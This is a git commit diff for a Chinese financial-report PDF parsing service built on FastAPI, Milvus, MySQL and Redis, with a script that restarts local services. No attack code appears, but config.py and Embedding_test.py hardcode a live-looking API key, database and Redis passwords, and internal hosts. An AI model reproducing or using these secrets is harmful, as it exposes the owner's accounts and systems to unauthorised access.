feat: 导入全新的项目代码

feat: 清理工作区，为导入新代码做准备
2025-08-20 09:49:07 +08:00 · 2025-08-20 09:46:46 +08:00
52 changed files with 145232 additions and 3076 deletions
--- a/monitor_milvus.py
+++ b/monitor_milvus.py
@ -0,0 +1,58 @@
 import socket
 import subprocess
 import time
 from datetime import datetime
 def get_time():
    return datetime.now().strftime('%Y-%m-%d %H:%M:%S')
 def check_port(host, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        result = sock.connect_ex((host, port))
        sock.close()
        return result
    except Exception as e:
        print(f"[{get_time()}] 端口检测异常: {str(e)}")
        return False
 def restart_service():
    try:
        subprocess.run("bash /root/docker/milvus/standalone_embed.sh restart", shell=True)
        # 正确示例
     #   subprocess.run(["bash", "standalone_embed.sh", "restart"])
        print(f"[{get_time()}] milvus服务重启成功")
        return True
    except subprocess.CalledProcessError as e:
        print(f"[{get_time()}] 服务重启失败: {str(e)}")
        return False
 def restart_zzbservice():
    try:
        subprocess.run("cd /root/pdf_parser/zzb_data_prod", shell=True)
        subprocess.run("nohup python3 app.py > app.log 2>&1 &", shell=True)
        print("zzb服务重启成功")
        return True
    except subprocess.CalledProcessError as e:
        print(f"[{get_time()}] zzb服务重启失败: {str(e)}")
 if __name__ == '__main__':
    print(f"[{get_time()}] 启动Milvus监控服务")
    port_ok = check_port("127.0.0.1", 19530)
    if  port_ok not in [0,True]:
        print("检测到Milvus服务异常，尝试重启...")
        restart_service()
    print(f"[{get_time()}] 启动zzb监控服务")
    port_ok = check_port("127.0.0.1", 8000)
    if  port_ok not in [0,True]:
        print("检测到zzb服务异常，尝试重启...")
        restart_zzbservice()
--- a/zzb_data_prod/.DS_Store
+++ b/zzb_data_prod/.DS_Store
--- a/zzb_data_prod/Embedding_test.py
+++ b/zzb_data_prod/Embedding_test.py
@ -0,0 +1,99 @@
 # Requires transformers>=4.51.0
 import torch
 import torch.nn.functional as F
 from torch import Tensor
 from modelscope import AutoTokenizer, AutoModel
 import datetime
 import dashscope
 from http import HTTPStatus
 dashscope.api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
 def embed_with_str(input):
    retry = 0
    max_retry = 5
    t = 0.2
    while retry < max_retry:
        # time.sleep(t)
        #阿里接口限流 
        resp = dashscope.TextEmbedding.call(
            model=dashscope.TextEmbedding.Models.text_embedding_v2,
            input=input)
        if resp.status_code == HTTPStatus.OK:
            return resp
        elif resp.status_code == 429:
            logger.info(f'触发限流,等待{t}秒后重试')
            retry += 1
            t+=0.1
        else:
            logger.error(f'请求失败,状态码:{resp.status_code}')
            return None
    logger.error('重试超过上限')
    return None
 def last_token_pool(last_hidden_states: Tensor,
                 attention_mask: Tensor) -> Tensor:
    left_padding = (attention_mask[:, -1].sum() == attention_mask.shape[0])
    if left_padding:
        return last_hidden_states[:, -1]
    else:
        sequence_lengths = attention_mask.sum(dim=1) - 1
        batch_size = last_hidden_states.shape[0]
        return last_hidden_states[torch.arange(batch_size, device=last_hidden_states.device), sequence_lengths]
 def get_detailed_instruct(task_description: str, query: str) -> str:
    return f'Instruct: {task_description}\nQuery:{query}'
 # Each query must come with a one-sentence instruction that describes the task
 task = 'Given a web search query, retrieve relevant passages that answer the query'
 queries = [
    get_detailed_instruct(task, 'What is the capital of China?'),
    get_detailed_instruct(task, 'Explain gravity')
 ]
 # No need to add instruction for retrieval documents
 documents = [
    "The capital of China is Beijing.",
    "Gravity is a force that attracts two bodies towards each other. It gives weight to physical objects and is responsible for the movement of planets around the sun."
 ]
 input_texts = queries + documents
 tokenizer = AutoTokenizer.from_pretrained('Qwen/Qwen3-Embedding-0.6B', padding_side='left')
 model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B')
 # We recommend enabling flash_attention_2 for better acceleration and memory saving.
 # model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B', attn_implementation="flash_attention_2", torch_dtype=torch.float16).cuda()
 print(datetime.datetime.now())
 max_length = 8192
 # Tokenize the input texts
 batch_dict = tokenizer(
    input_texts,
    padding=True,
    truncation=True,
    max_length=max_length,
    return_tensors="pt",
 )
 batch_dict.to(model.device)
 outputs = model(**batch_dict)
 embeddings = last_token_pool(outputs.last_hidden_state, batch_dict['attention_mask'])
 # normalize embeddings
 embeddings = F.normalize(embeddings, p=2, dim=1)
 print(f"=========embeddings=========")
 print(datetime.datetime.now())
 scores = (embeddings[:2] @ embeddings[2:].T)
 print(len(embeddings.tolist()[0]))
 # [[0.7645568251609802, 0.14142508804798126], [0.13549736142158508, 0.5999549627304077]]
 vector_obj = embed_with_str(input_texts)          
 vector = vector_obj.output["embeddings"][0]["embedding"]
 print(len(vector))
--- a/zzb_data_prod/Mil_unit.py
+++ b/zzb_data_prod/Mil_unit.py
@ -1,9 +1,11 @@
 from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
 from config import MILVUS_CLIENT
 import time
 from datetime import datetime, timedelta
 def create_partition_by_hour(current_hour):
    # 连接到 Milvus 服务器
-    connections.connect("default",uri=MILVUS_CLIENT)
+    connections.connect(uri=MILVUS_CLIENT)
    # 获取集合
    collection_name = "pdf_measure_v4"
    collection = Collection(collection_name)
@ -32,37 +34,6 @@ def create_partition_by_hour(current_hour):
 # data = []
 # measure_data = {}
 # vector = [0.61865162262130161] * 1536
 # measure_data['vector'] = vector
 # measure_data['table_num'] = int(2)
 # measure_data['table_index'] = int(2)
 # measure_data['measure_name'] = "234234"
 # measure_data['measure_value'] = "23432"
 # measure_data['measure_unit'] = "123423"
 # measure_data['file_id'] = "100000"
 #
 # data.append(measure_data)
 # res = client.insert(
 #                 collection_name=collection_name,
 #                 data=data,
 #                 partition_name=partition_name
 #             )
 # filter_str = 'file_id == "'+"2122"+'"'
 # res = client.search(
 #     collection_name=collection_name,  # Replace with the actual name of your collection
 #     # Replace with your query vector
 #     data=data,
 #     limit=3,  # Max. number of search results to return
 #     search_params={"metric_type": "COSINE", "params": {}},  # Search parameters
 #     output_fields=["measure_name", "measure_value", "table_num", "table_index", "measure_unit"],
 #     filter=filter_str,
 #     partition_name=partition_name
 # )
 # print(f"============================={res}")
--- a/zzb_data_prod/app.py
+++ b/zzb_data_prod/app.py
@ -14,10 +14,10 @@ import db_service
 import threading
 from Mil_unit import create_partition_by_hour
 from datetime import datetime, timedelta
-
+from log_config import logger
 app = FastAPI()
-cpu_count = os.cpu_count()
+cpu_count = 4
 job_queue = queue.Queue()
 # 定义请求体模型
@ -30,7 +30,7 @@ def run_job():
    if_run = True
    if job_queue.empty():
-        print(f"job_queue为空: {file_path}")
+        logger.info(f"job_queue为空: {file_path}")
        if_run = False
    if if_run:
@ -43,29 +43,19 @@ def run_job():
        try:
            #下载pdf
            start_time = time.time()
-            print(f"开始启动文件解析任务: {file_path}")
+            logger.info(f"开始启动文件解析任务: {file_path}")
            if file_path.startswith('http'):
                file_path = utils.save_pdf_from_url(file_path, config.FILE_PATH)
            try:
                file_info = pdf_title.create_text_outline(file_path,file_id)
            except Exception as e:
                response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 7})
-                print(f'通知任务状态url:{file_id}:{response.url}')
+                logger.info(f'通知任务状态url:{file_id}:{response.url}')
-                print(f'通知任务状态任务:{file_id}:{response.text}')
+                logger.info(f'通知任务状态任务:{file_id}:{response.text}')
-                print(f"{file_id}运行失败: {e}")
+                logger.info(f"{file_id}运行失败: {e}")
                continue_execution = False
            if continue_execution:
                print(cpu_count)
                parent_table_pages = file_info['parent_table_pages']
                print('parent_table_pages的值是')
                print(parent_table_pages)
                # page_nums = [
                #     '1-3',
                #     '4-6',
                # ]
                print(cpu_count)
                print('测试')
                page_num = file_info['page_count']
                if page_num < cpu_count:
                    p_count = page_num
@ -73,7 +63,6 @@ def run_job():
                    p_count = cpu_count
                for i in range(p_count):
            # for i in range(2):
                    page_list.append({
                        'type': 'table',
                        'page_num': file_info['split_parts']['table_split_parts'][i],
@ -88,8 +77,8 @@ def run_job():
                # 通知开始解析
                response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 5})
-                print(f'通知pdf开始解析url:{file_id}:{response.url}')
+                logger.info(f'通知pdf开始解析url:{file_id}:{response.url}')
-                print(f'通知pdf开始解析状态:{file_id}:{response.text}')
+                logger.info(f'通知pdf开始解析状态:{file_id}:{response.text}')
                parser_start_time = time.time()
                processes = []
                time_dispatch_job = time.time()
@ -98,30 +87,27 @@ def run_job():
                    p = Process(target=main.dispatch_job, args=(job_info,))
                    processes.append(p)
                    p.start()
            #time_dispatch_job_end = time.time()
            #process_time = time_dispatch_job_end - time_dispatch_job
            #db_service.process_time(file_id,'1',process_time)
-                print('等待所有子任务完成，任务ID:', file_id)
+                logger.info(f'等待所有子任务完成，任务ID:{file_id}')
                for p in processes:
                    p.join()
-                print('pdf解析任务完成任务完成，任务ID:', file_id)
+                logger.info(f'pdf解析任务完成任务完成，任务ID:{file_id}')
                time_dispatch_job_end = time.time()
                process_time = time_dispatch_job_end - time_dispatch_job
                db_service.process_time(file_id,'1',process_time,time_dispatch_job,time_dispatch_job_end)
                parser_end_time = time.time()
-                print(f"解析任务 {file_id} 完成，耗时{(parser_end_time - parser_start_time):.2f} 秒。")
+                logger.info(f"解析任务 {file_id} 完成，耗时{(parser_end_time - parser_start_time):.2f} 秒。")
                #这里做一步判断，看看是否还要继续。
                if db_service.file_type_check(file_id):
-                    print("文本较真表格生成已结束")
+                    logger.info(f"文本较真表格生成已结束")
                else:
                    # 通知抽取指标
                    response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 6})
-                    print(f'通知开始抽取指标url:{file_id}:{response.url}')
+                    logger.info(f'通知开始抽取指标url:{file_id}:{response.url}')
-                    print(f'通知开始抽取指标状态:{file_id}:{response.text}')
+                    logger.info(f'通知开始抽取指标状态:{file_id}:{response.text}')
                    parser_start_time = time.time()
-                    print('开始表格指标抽取，任务ID:', file_id)
+                    logger.info(f'开始表格指标抽取，任务ID:{file_id}')
                    time_start = time.time()
@ -131,6 +117,7 @@ def run_job():
                    partition_name = f"partition_{current_hour}"
                    # 判断是否创建新的分区
                    create_partition_by_hour(current_hour)
                    time.sleep(10)
                    # 判断是否为3季报
                    if db_service.file_type_check_v2(file_id) == 3:
@ -138,17 +125,17 @@ def run_job():
                        time_start_end = time.time()
                        process_time = time_start_end - time_start
                        db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
-                        print('表格指标抽取完成，任务ID:', file_id)
+                        logger.info(f'表格指标抽取完成，任务ID:{file_id}')
                        parser_end_time = time.time()
-                        print(f"表格指标抽取 {file_id} 完成，耗时{(parser_end_time - parser_start_time):.2f} 秒。")
+                        logger.info(f"表格指标抽取 {file_id} 完成，耗时{(parser_end_time - parser_start_time):.2f} 秒。")
-                        print('启动这个指标归一化任务ID-修改测试:', file_id)
+                        logger.info(f'启动这个指标归一化任务ID-修改测试:{file_id}')
                        time_update = time.time()
                        main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)
-                        print('归一化完成任务ID:', file_id)
+                        logger.info(f'归一化完成任务ID:{file_id}')
                        end_time = time.time()
-                        print(f"任务 {file_id} 完成，耗时{(end_time - start_time):.2f} 秒。")
+                        logger.info(f"任务 {file_id} 完成，耗时{(end_time - start_time):.2f} 秒。")
                        time_update_end = time.time()
                        process_time = time_update_end - time_update
                        db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
@ -158,25 +145,25 @@ def run_job():
                        time_start_end = time.time()
                        process_time = time_start_end - time_start
                        db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
-                        print('表格指标抽取完成，任务ID:', file_id)
+                        logger.info(f'表格指标抽取完成，任务ID:{file_id}')
                        parser_end_time = time.time()
-                        print(f"表格指标抽取 {file_id} 完成，耗时{(parser_end_time - parser_start_time):.2f} 秒。")
+                        logger.info(f"表格指标抽取 {file_id} 完成，耗时{(parser_end_time - parser_start_time):.2f} 秒。")
-                        print('启动这个指标归一化任务ID-修改测试:', file_id)
+                        logger.info(f'启动这个指标归一化任务ID-修改测试:{file_id}')
                        time_update = time.time()
                        main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)
-                        print('归一化完成任务ID:', file_id)
+                        logger.info(f'归一化完成任务ID:{file_id}')
                        end_time = time.time()
-                        print(f"任务 {file_id} 完成，耗时{(end_time - start_time):.2f} 秒。")
+                        logger.info(f"任务 {file_id} 完成，耗时{(end_time - start_time):.2f} 秒。")
                        time_update_end = time.time()
                        process_time = time_update_end - time_update
                        db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
                #通知任务完成
                response_time = time.time()
                response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 1})
-                print(f'通知任务状态url:{file_id}:{response.url}')
+                logger.info(f'通知任务状态url:{file_id}:{response.url}')
-                print(f'通知任务状态任务:{file_id}:{response.text}')
+                logger.info(f'通知任务状态任务:{file_id}:{response.text}')
                response_time_end = time.time()
                process_time = response_time_end - response_time
                db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
@ -191,17 +178,17 @@ def run_job():
            response_time_end = time.time()
            process_time = response_time_end - response_time
            db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
-            print(f'通知任务状态url:{file_id}:{response.url}')
+            logger.info(f'通知任务状态url:{file_id}:{response.url}')
-            print(f'通知任务状态任务:{file_id}:{response.text}')
+            logger.info(f'通知任务状态任务:{file_id}:{response.text}')
-            print(f"Response status code: {response.status_code}")
+            logger.info(f"Response status code: {response.status_code}")
-            print(f"{file_id}运行失败: {e}")
+            logger.info(f"{file_id}运行失败: {e}")
        finally:
-            print(f"任务 {file_id} 完成，运行状态：{job_status}")
+            logger.info(f"任务 {file_id} 完成，运行状态：{job_status}")
            #pdf_company_0824.name_code_fix(file_id,file_path)
            #print('公司名与编码填充完毕')
    else:
-        print("有任务运行中，需要等待.....")
+        logger.info(f"有任务运行中，需要等待.....")
 def parse_pdf_route(fileItem: FileItem):
@ -210,7 +197,7 @@ def parse_pdf_route(fileItem: FileItem):
        'file_path' : fileItem.file_path,
        'file_id' : fileItem.file_id
    })
-    print(f"增加 {fileItem.file_id} 到队列.")
+    logger.info(f"增加 {fileItem.file_id} 到队列.")
    threading.Thread(target=run_job, args=()).start()
@ -221,16 +208,37 @@ app.post("/parser/start",
        summary="解析Pdf文件", 
        )(parse_pdf_route)
 def get_local_ip():
    try:
        # 创建一个 UDP 套接字
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # 连接到一个外部地址（这里使用 Google 的公共 DNS 服务器）
        s.connect(("8.8.8.8", 80))
        # 获取本地套接字的 IP 地址
        local_ip = s.getsockname()[0]
    except Exception as e:
        logger.info(f"获取内网 IP 失败: {e}")
        local_ip = "127.0.0.1"  # 如果失败，返回本地回环地址
    finally:
        s.close()  # 关闭套接字
    return local_ip
 # 运行 FastAPI 应用
 if __name__ == "__main__":
    # 服务器启动服务
-    # import uvicorn
+    import uvicorn
-    # uvicorn.run(app, host="0.0.0.0", port=config.PORT)
+    uvicorn.run(app, host="0.0.0.0", port=config.PORT)
    try:
        # 获取内网IP
        ip = get_local_ip()
        response = requests.get(f"/api/tenant/report/restart?address={ip}:{config.PORT}")
    except KeyboardInterrupt:
        logger.info("Shutdown server")
    # 本地调试任务
-    job_queue.put({
+    # job_queue.put({
-     'file_path' : '3.pdf',
+    #  'file_path' : '1.pdf',
-     'file_id' : '2122'
+    #  'file_id' : '2122'
-     })
+    #  })
-
+    #
-    run_job()
+    # run_job()
--- a/zzb_data_prod/combined_v61.pdf
+++ b/zzb_data_prod/combined_v61.pdf
--- a/zzb_data_prod/config.py
+++ b/zzb_data_prod/config.py
@ -1,28 +1,28 @@
-MILVUS_CLIENT='http://124.70.129.232:19530'
+MILVUS_CLIENT='http://127.0.0.1:19530'
-#MILVUS_CLIENT='http://60.204.228.154:19530'
+MILVUS_HOST = '127.0.0.1'
-MYSQL_HOST = '121.37.185.246'
+MILVUS_PORT = 19530
 MYSQL_HOST = '10.127.2.207'
 MYSQL_PORT = 3306
-MYSQL_USER = 'financial' 
+MYSQL_USER = 'financial_prod'
-MYSQL_PASSWORD = 'financial_8000'
+MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
-MYSQL_DB = 'financial_report'
+MYSQL_DB = 'financial_report_test'
-NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'
+NOTIFY_ADDR = 'http://10.127.2.206:8101/api/tenant/report/notify'
-NOTIFY_ADDR_DIS = 'http://127.0.0.1:8100/api/tenant/info/notify'
+FILE_PATH = '/root/pdf_parser/pdf/'
-REDIS_HOST = '123.60.153.169'
+REDIS_HOST = '10.127.2.206'
 REDIS_PORT = 6379
 REDIS_PASSWORD = 'Xgf_redis'
 FILE_PATH = '/root/pdf_parser/pdf/'
 PORT = 8000
-MEASURE_COUNT = 8
+MEASURE_COUNT = 4
-MYSQL_HOST_APP = '121.37.185.246'
+MYSQL_HOST_APP = '10.127.2.207'
 MYSQL_PORT_APP = 3306
-MYSQL_USER_APP = 'financial'
+MYSQL_USER_APP = 'financial_prod'
-MYSQL_PASSWORD_APP = 'financial_8000'
+MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
-MYSQL_DB_APP = 'financial_report'
+MYSQL_DB_APP = 'financial_report_test'
 api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
        #   'sk-3cc9e1601f654c149d2a4e99ef8a8946'
 #MYSQL_HOST_APP = '192.168.0.201'
 #MYSQL_PORT_APP = 3306
 #MYSQL_USER_APP = 'root'
 #MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
 #MYSQL_DB_APP = 'financial_report_prod'
--- a/zzb_data_prod/db_service.py
+++ b/zzb_data_prod/db_service.py
@ -10,6 +10,9 @@ from pymilvus import MilvusClient
 import mysql.connector
 import threading
 import redis
 from log_config import logger
 measure_name_keywords = ["营业","季度","利润","归属于","扣非","经营","现金","活动","损益","收益","资产","费用","销售","管理","财务","研发","货币资金","应收账款","存货","固定资产","在建工程","商誉","短期借款","应付账款","合同负债","长期借款","营业成本"]
 # 解析大模型抽取的指标，并插入到数据库
@ -133,9 +136,9 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
                WHERE file_id = %s AND page_num = %s AND table_index = %s
            '''
            cursor.execute(update_query, (unit, file_id, page_num, table_index))
-            #print(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
+            logger.info(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
        else:
-            print(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
+            logger.info(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
    else:
        # 插入新的记录
        insert_query = '''
@ -145,7 +148,7 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
        '''
        data_to_insert = (file_id, page_num, table_index, unit)
        cursor.execute(insert_query, data_to_insert)
-        #print(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')
+        logger.info(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')
    conn.commit()
@ -190,6 +193,16 @@ def update_ori_measure(conn,cursor,file_id):
                and t1.file_id = '{file_id}'
                and t2.year = '{year}'
                '''.format(file_id=file_id, year=report_year)
    select_query_first = '''
                SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id 
                FROM ori_measure_list t1
                left join
                measure_config_first_quarter t2
                on t1.ori_measure_id = t2.ori_measure_id 
                where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
                and t1.file_id = '{file_id}'
                and t2.year = '{year}'
                '''.format(file_id=file_id, year=report_year)
    select_query_half_year = '''
                SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id 
                FROM ori_measure_list t1
@ -211,53 +224,67 @@ def update_ori_measure(conn,cursor,file_id):
                and t2.year = '{year}'
                '''.format(file_id=file_id, year=report_year)
-    if report_type == 1:
+    if report_type == 1:#半年报
        start_time = time.time()
        cursor.execute(select_query_half_year)
        records = cursor.fetchall()
        end_time = time.time()
-        print(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
+        logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
-        print(f'update_ori_measure方法走的是半年报')
+        logger.info(f'update_ori_measure方法走的是半年报')
-    elif report_type == 3:
+    elif report_type == 2: # 一季报
        start_time = time.time()
        cursor.execute(select_query_first)
        records = cursor.fetchall()
        end_time = time.time()
        logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
        logger.info(f'update_ori_measure方法走的是一季报')
    elif report_type == 3: # 三季报
        start_time = time.time()
        cursor.execute(select_query_thrid)
        records = cursor.fetchall()
        end_time = time.time()
-        print(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
+        logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
-        print(f'update_ori_measure方法走的是三季报')
+        logger.info(f'update_ori_measure方法走的是三季报')
-    else:
+    else:# 年报
        start_time = time.time()
        cursor.execute(select_query)
        records = cursor.fetchall()
        end_time = time.time()
-        print(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
+        logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
-        print(f'update_ori_measure方法走的是全年报')
+        logger.info(f'update_ori_measure方法走的是全年报')
    start_time = time.time()
    for record in records:
        data_to_update = (record[0], record[1], record[2], file_id)
        cursor.execute(update_query, data_to_update)
        conn.commit()
    end_time = time.time()
-    print(f"更新数据更新 {(end_time - start_time):.2f} 秒。")
+    logger.info(f"更新数据更新 {(end_time - start_time):.2f} 秒。")
    #更新measure_list表，增加此次文件的显示指标
    start_time = time.time()
    create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
-    if report_type == 0:
+    if report_type == 0:#全年报
        insert_query = '''
                    INSERT INTO measure_list
                    (measure_id, measure_name, create_time, update_time, file_id) 
                    select distinct measure_id,measure_name, %s,%s,%s from measure_config
                    where year = '{year}'
                    '''.format(year=report_year)
-    elif report_type == 3:
+    elif report_type == 2:# 一季报
        insert_query = '''
                    INSERT INTO measure_list
                    (measure_id, measure_name, create_time, update_time, file_id) 
                    select distinct measure_id,measure_name, %s,%s,%s from measure_config_first_quarter
                    where year = '{year}' 
                    '''.format(year=report_year)
    elif report_type == 3:# 三季报
        insert_query = '''
                    INSERT INTO measure_list
                    (measure_id, measure_name, create_time, update_time, file_id) 
                    select distinct measure_id,measure_name, %s,%s,%s from measure_config_third_quarter
                    where year = '{year}'
                    '''.format(year=report_year)
-    else:
+    else:# 半年报
        insert_query = '''
                    INSERT INTO measure_list
                    (measure_id, measure_name, create_time, update_time, file_id) 
@ -269,13 +296,13 @@ def update_ori_measure(conn,cursor,file_id):
    cursor.execute(insert_query, data_to_update)
    conn.commit()
    end_time = time.time()
-    print(f"更新数据写入 {(end_time - start_time):.2f} 秒。")
+    logger.info(f"更新数据写入 {(end_time - start_time):.2f} 秒。")
 def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name,):
    create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")    
-    print('Run task %s (%s)...' % (record_range, os.getpid()))
+    logger.info(f'Run task {record_range} ({os.getpid()})...')
-    print(f"插入数据 {len(records)}")
+    logger.info(f"插入数据 {len(records)}")
    conn = mysql.connector.connect(
@ -332,11 +359,12 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
    cursor_app.execute(select_parent_query)
    parent_records = cursor_app.fetchall()
-    #print(f"before: {parent_table_pages}")
+    
    for parent_record in parent_records:
        parent_id = parent_record[0]
        parent_table_pages.append(int(parent_id))
-    #print(f"after: {parent_table_pages}")
+ 
    #表格上方文字黑名单关键词的页码和表格下标转成数组
    table_index_array = []
@ -348,15 +376,19 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
    measure_index_array = []
    cursor_app.execute(select_measure_index_query, (file_id,))
    measure_index_records = cursor_app.fetchall()
-    print("Executing SQL:", select_measure_index_query)
+    logger.info(f"Executing SQL:{select_measure_index_query}")
-    print("With file_id:", file_id)
+    logger.info(f"With file_id:{file_id}")
    for measure_index_record in measure_index_records:
        measure_index_array.append(measure_index_record[0])
-    print(f'黑名单的值是{parent_table_pages}和{table_index_array}以及新增的{measure_index_array}')
+    logger.info(f'黑名单的值是{parent_table_pages}和{table_index_array}以及新增的{measure_index_array}')
    #print(f'黑名单的值是{parent_table_pages}和{table_index_array}')
    record_start = record_range.split('-')[0]
    record_end = record_range.split('-')[1]
    if str(report_type) == "2":
        table_index_array = []
        measure_index_array = []
    client = MilvusClient(
        uri=MILVUS_CLIENT,
    )
@ -370,6 +402,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
            ori_measure_id = record[3]
            measure_id = record[4]
            measure_vector = redis_service.read_from_redis(redis_client,ori_measure_id)
            measure_list = ast.literal_eval(measure_vector)
            data = [measure_list]
            filter_str = 'file_id == "'+file_id+'"'
@ -384,9 +418,9 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                partition_name=partition_name
            )
            # Convert the output to a formatted JSON string
            # for i in range(len(res[0])):
            for i in range(len(res[0])):
                vector_distance = float(res[0][i]["distance"])
@ -411,17 +445,18 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                if utils.check_pdf_measure_black_list(pdf_measure):
                    continue
                if f"{table_num}_{table_index}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
-                    #if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
+                    logger.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
                    print(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
                    continue
                if vector_distance > distance and table_num not in parent_table_pages:   
                    #检测规则开始
                    #判断抽取指标和财报指标周期是否相同
                    ori_period = utils.get_period_type(ori_measure_name, report_year)
                    pdf_period = utils.get_period_type(pdf_measure, report_year)
                    if pdf_measure == '2023年6月30日货币资金合计':
-                        print(f'第1处{ori_period}和{pdf_period}')
+                        logger.info(f'第1处{ori_period}和{pdf_period}')
                    if(ori_period != pdf_period):
                        continue
@ -429,7 +464,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    start_ori_period = utils.get_start_period_type(ori_measure_name)
                    start_pdf_period = utils.get_start_period_type(pdf_measure)
                    if pdf_measure == '2023年6月30日货币资金合计':
-                        print(f'第2处{start_ori_period}和{start_pdf_period}')
+                        logger.info(f'第2处{start_ori_period}和{start_pdf_period}')
                    if(start_ori_period != start_pdf_period):
                        continue
@ -437,7 +472,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    ori_season_type = utils.get_season_flag(ori_measure_name)
                    pdf_season_type = utils.get_season_flag(pdf_measure)
                    if pdf_measure == '2023年6月30日货币资金合计':
-                        print(f'第3处{ori_season_type}和{pdf_season_type}')
+                        logger.info(f'第3处{ori_season_type}和{pdf_season_type}')
                    if(ori_season_type != pdf_season_type):
                        continue
@ -445,7 +480,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    ori_kf_type = utils.get_kf_flag(ori_measure_name)
                    pdf_kf_type = utils.get_kf_flag(pdf_measure)
                    if pdf_measure == '2023年6月30日货币资金合计':
-                        print(f'第4处{ori_kf_type}和{pdf_kf_type}')
+                        logger.info(f'第4处{ori_kf_type}和{pdf_kf_type}')
                    if(ori_kf_type != pdf_kf_type):
                        continue
@ -453,7 +488,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    ori_type = utils.get_percent_flag(ori_measure_name)
                    pdf_type = utils.get_percent_flag(pdf_measure)
                    if pdf_measure == '2023年6月30日货币资金合计':
-                        print(f'第5处{ori_type}和{pdf_type}')
+                        logger.info(f'第5处{ori_type}和{pdf_type}')
                    if(ori_type != pdf_type):
                        continue
@ -461,7 +496,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    ori_growth_type = utils.get_percent_growth(ori_measure_name)
                    pdf_growth_type = utils.get_percent_growth(pdf_measure)
                    if pdf_measure == '2023年6月30日货币资金合计':
-                        print(f'第6处{ori_growth_type}和{pdf_growth_type}')
+                        logger.info(f'第6处{ori_growth_type}和{pdf_growth_type}')
                    if(ori_growth_type != pdf_growth_type):
                        continue
@ -531,7 +566,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    cursor.execute(insert_query, data_to_insert)
                    conn.commit()
    except Exception as e:
-        print(e)
+        logger.info(e)
    finally:
        parent_table_pages = []
        client.close()
@ -550,6 +585,10 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
                SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config
                where year = '{year}'
                '''.format(year=report_year)
    select_query_first_quarter = '''
                SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
                where year = '{year}' 
                '''.format(year=report_year)
    select_query_half_year = '''
                SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_half_year
                where year = '{year}'
@ -574,8 +613,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
        cursor.execute(select_query_half_year)
        records = cursor.fetchall()
        end_time = time.time()
-        print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
+        logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
-        print('insert_table_measure_from_vector_async_process方法走的半年报')
+        logger.info(f'insert_table_measure_from_vector_async_process方法走的半年报')
        start_time = time.time()
